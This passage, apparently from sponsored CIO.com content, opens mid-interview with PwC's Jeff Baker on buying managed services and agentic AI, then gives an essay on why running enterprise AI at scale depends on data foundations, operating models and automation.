Where it can get tricky is in how these services are purchased. In an RFP process, procurement teams often try to normalize key elements across vendors. But that can flatten the innovation that providers are trying to bring to the table.

CIO.com: Looking ahead 3 to 5 years, what will separate organizations that succeed with AI from those that remain stuck in pilot mode?

Jeff Baker: It comes down to focusing on the business outcomes. What are you trying to achieve with technology, people, and your organization?

And then, in some ways, you have to get out of the way of the agents. They think differently than humans do. I see too many companies trying to treat agentic systems like a traditional business process automation exercise.

Instead, you should focus those agents on outcomes and allow them to operate in the way they’re designed to. That’s where you’re going to see a bigger impact.

To learn more about PwC managed services, click here.

Enterprises have made significant progress in building artificial intelligence capabilities. Access to models, tools, and platforms has expanded rapidly, lowering the barrier to entry for experimentation. Yet many organizations are discovering that building AI is only the first step. Running it at scale is where the real challenge begins.

The difficulty is not in creating models, but in operationalizing them.

As AI moves from pilot to production, it must integrate into complex enterprise environments. These environments include fragmented data systems, legacy infrastructure, and distributed workflows that were not designed to support AI-driven execution. What works in a controlled experiment often breaks down under real-world conditions.

Data is one of the most significant constraints. AI systems rely on consistent, high-quality, and context-rich data. In most enterprises, data is spread across multiple platforms and lacks a unified structure. Without a shared understanding of what data represents, models struggle to produce reliable outputs. More importantly, business teams cannot act on those outputs with confidence.

This challenge becomes more pronounced as organizations attempt to scale AI across use cases. Each new deployment introduces additional complexity, from data integration and governance to security and compliance. Without a strong foundation, these factors slow progress and increase operational risk.

Running AI also requires a different operating model. Traditional approaches to cloud and application management are often reactive, relying on manual processes and ticket-driven workflows. These models are not designed to support the continuous monitoring, iteration, and optimization that AI systems require.

Organizations that treat AI as an isolated capability often encounter friction at this stage. Models may perform well in testing, but struggle to deliver consistent value once deployed. This disconnect between development and operations limits the return on AI investments.

In contrast, organizations that succeed with AI focus on how it is run, not just how it is built. They align data, infrastructure, and operations around AI-driven execution. This includes creating unified data environments, embedding governance into workflows, and enabling real-time access to information.

Automation plays a critical role in this transition. Managing AI systems at scale involves monitoring performance, maintaining data quality, and responding to changing conditions. Embedding automation into these processes helps reduce manual effort and improve consistency. Over time, this enables organizations to operate AI systems more efficiently and with greater reliability.

The shift toward AI-first operating models is becoming more pronounced. In these environments, intelligence and automation are embedded into how systems are designed and operated. This allows organizations to move from reactive processes to more proactive and predictive operations. As a result, they can reduce operational overhead, improve delivery speed, and better support AI-driven innovation. 

This evolution is also being driven by increasing business expectations. Leadership teams expect AI to deliver measurable outcomes tied to efficiency, speed, and resilience. However, these outcomes depend on the ability to run AI effectively across the enterprise. Without the right operating model, even advanced AI capabilities will struggle to deliver consistent value.

At the same time, AI-native organizations are setting a new benchmark. They can deploy and scale AI more quickly because their environments are built with automation and integration at the core. This allows them to iterate faster and respond more effectively to changing conditions.

For established enterprises, the path forward requires a shift in focus. Building AI capabilities remains important, but it must be matched with investments in data foundations, operating models, and automation. This is what enables AI to move beyond experimentation and deliver real business outcomes.

The takeaway for CIOs and technology leaders is clear: the success of AI initiatives depends less on the models themselves and more on the systems that support them. Organizations that prioritize how AI is run will be better positioned to scale, adapt, and realize the full value of their investments.

Continue building your AI strategy with a practical, execution-focused framework. Check out the AI Action Playbook to about the five stages of enterprise AI maturity.